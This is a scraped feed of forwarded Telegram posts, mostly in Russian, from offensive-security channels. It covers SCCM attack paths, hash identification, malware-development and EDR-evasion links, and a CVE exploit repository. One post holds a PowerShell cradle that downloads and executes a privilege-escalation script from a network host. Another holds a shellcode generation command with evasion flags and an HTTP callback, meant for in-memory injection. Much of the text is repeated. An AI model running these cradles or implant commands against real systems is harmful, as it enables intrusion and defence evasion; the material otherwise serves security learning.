Forwarded from 1N73LL1G3NC3
Offensive SCCM Summary
Table of Contents:
- Tooling & Who To Follow
- SCCM Attack Paths
- Recon – Find SCCM Infrastructure
- Credential Access – Obtain PXE Media File
- Credential Access – Obtain NAA Creds
- Credential Access – Read unattend.xml
- Recon – Identify Site Information
- Enumeration – Logs
- Enumeration – Previously Executed Scripts
- Recon – Enumerate SiteStore Scripts
- Enumeration – SCCMContentLib
- Enumeration – PXEBoot Shares
-Credential Access – NAA
- ms-DS-MachineAccountQuota
- Credential Access – Client Push Account
- Lateral Movement – Client Push Account
- Lateral Movement – Via SQL
- Lateral Movement – Via AdminService API
- Lateral Movement – NTLM Relay To Other SCCM Clients
- SQL DB Admin To Primary Site DB (Obtain SCCM User Creds, Dumping Task Sequences)
- Coerce NTLM Authentication
- Primary Site Admin
- Recon – Perform Recon Queries
- Lateral Movement – Deploy an application
- Lateral Movement – Arbitrary NTLM Coercion
Table of Contents:
- Tooling & Who To Follow
- SCCM Attack Paths
- Recon – Find SCCM Infrastructure
- Credential Access – Obtain PXE Media File
- Credential Access – Obtain NAA Creds
- Credential Access – Read unattend.xml
- Recon – Identify Site Information
- Enumeration – Logs
- Enumeration – Previously Executed Scripts
- Recon – Enumerate SiteStore Scripts
- Enumeration – SCCMContentLib
- Enumeration – PXEBoot Shares
-Credential Access – NAA
- ms-DS-MachineAccountQuota
- Credential Access – Client Push Account
- Lateral Movement – Client Push Account
- Lateral Movement – Via SQL
- Lateral Movement – Via AdminService API
- Lateral Movement – NTLM Relay To Other SCCM Clients
- SQL DB Admin To Primary Site DB (Obtain SCCM User Creds, Dumping Task Sequences)
- Coerce NTLM Authentication
- Primary Site Admin
- Recon – Perform Recon Queries
- Lateral Movement – Deploy an application
- Lateral Movement – Arbitrary NTLM Coercion
Forwarded from 1N73LL1G3NC3
🔑 HAITI
Hash type identifier (CLI & lib)
Features:
— 519+ hash types detected
— Modern algorithms supported (SHA3, Keccak, Blake2, etc.)
— Hashcat and John the Ripper references
— CLI tool & library
— Hackable
Hash type identifier (CLI & lib)
Features:
— 519+ hash types detected
— Modern algorithms supported (SHA3, Keccak, Blake2, etc.)
— Hashcat and John the Ripper references
— CLI tool & library
— Hackable
Forwarded from reewardius' 🇺🇦
вот тебе матрицы, на вебера и на инфру, что тебе ближе и к чему душа лежит - решать тебе, на какие сертификации равняться, чтобы видеть уровень - тоже есть.
инфра: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=1689065888
веб: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=0
инфра: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=1689065888
веб: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=0
Forwarded from sn🥶vvcr💥sh
Invoke-winPEASInject.ps1
3.7 MB
iex(new-object net.webclient).downloadstring("http://192.168.1.80/Invoke-winPEASInject.ps1");Invoke-winPEASInjectForwarded from sn🥶vvcr💥sh
попробуй шеллкод сгенерить так
и потом самым простым инжектором по типу https://ppn.snovvcrash.rocks/red-team/maldev/code-injection/shellcode-runners#c-dll-with-powershell-cradle-in-memory запустить из памяти
generate --os windows --arch amd64 --format shellcode --evasion --disable-sgn --http example.com:443 --limit-domainjoined --name victimpc --save /home/snovvcrash/www/shellcode.bin
и потом самым простым инжектором по типу https://ppn.snovvcrash.rocks/red-team/maldev/code-injection/shellcode-runners#c-dll-with-powershell-cradle-in-memory запустить из памяти
Forwarded from white2hack 📚
Реверс-инжиниринг встраиваемых систем, Усанов А. Е., 2023
Перед вами руководство по погружению в мир встраиваемых систем – от их первоначального анализа и получения прошивки до нейтрализации механизмов защиты от реверс-инжиниринга и модификации. Приводится базовый набор оборудования и ПО, с помощью которого можно проводить исследования большинства систем.
Опытному читателю книга пригодится в качестве справочника, а начинающим исследователям будет полезно изучить ее от начала до конца.
#book #reverse
Перед вами руководство по погружению в мир встраиваемых систем – от их первоначального анализа и получения прошивки до нейтрализации механизмов защиты от реверс-инжиниринга и модификации. Приводится базовый набор оборудования и ПО, с помощью которого можно проводить исследования большинства систем.
Опытному читателю книга пригодится в качестве справочника, а начинающим исследователям будет полезно изучить ее от начала до конца.
#book #reverse
Forwarded from white2hack 📚
Реверс_инжиниринг_встраиваемых_систем_2023_Усанов_А_Е_.pdf
76.8 MB
Реверс-инжиниринг встраиваемых систем, Усанов А. Е., 2023
Forwarded from Offensive Xwitter
😈 [ Clandestine @akaclandestine ]
𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾
🔗 Part 1 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
🔗 Part 2 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
🔗 Part 3 - https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
🔗 Part 4 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e
🐥 [ tweet ]
𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾
🔗 Part 1 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
🔗 Part 2 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
🔗 Part 3 - https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
🔗 Part 4 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e
🐥 [ tweet ]
pentest-book/others/internal-pentest.md at master · six2dez/pentest-book · GitHub
https://github.com/six2dez/pentest-book/blob/master/others/internal-pentest.md
https://github.com/six2dez/pentest-book/blob/master/others/internal-pentest.md
GitHub
pentest-book/others/internal-pentest.md at master · six2dez/pentest-book
Contribute to six2dez/pentest-book development by creating an account on GitHub.
Forwarded from Pavel Cherepanov
Forwarded from Offensive Xwitter
😈 [ ShorSec Cyber Security @ShorSecLtd ]
🔥New Blog Post Alert!
The next chapter in our "The Path to DA" series is now live: "(Relaying) To The Internet And Back".
This entry, by @dec0ne, explores yet another route to DA, focusing on the intricacies of ADIDNS Abuse, LDAP relay, RBCD, and more.
🔗 https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/
🐥 [ tweet ]
🔥New Blog Post Alert!
The next chapter in our "The Path to DA" series is now live: "(Relaying) To The Internet And Back".
This entry, by @dec0ne, explores yet another route to DA, focusing on the intricacies of ADIDNS Abuse, LDAP relay, RBCD, and more.
🔗 https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/
🐥 [ tweet ]
Forwarded from D3R7K1K
https://github.com/Wh04m1001/CVE-2023-36874 ребят а как из исходников это собрать без sln
GitHub
GitHub - Wh04m1001/CVE-2023-36874
Contribute to Wh04m1001/CVE-2023-36874 development by creating an account on GitHub.
Exploit Java Deserialization | Discovering Insecure Deserialization
https://youtube.com/watch?v=lH2VNlf91pY&feature=shared
https://youtube.com/watch?v=lH2VNlf91pY&feature=shared
YouTube
Exploit Java Deserialization | Discovering Insecure Deserialization
Hi... It's been a while. Anyways, here's a new video!
This is the second in a three part series where we dissect Java deserialization vulnerabilities. Building off the last video, we discuss how to identify Java deserialization vulnerabilities from a blackbox…
This is the second in a three part series where we dissect Java deserialization vulnerabilities. Building off the last video, we discuss how to identify Java deserialization vulnerabilities from a blackbox…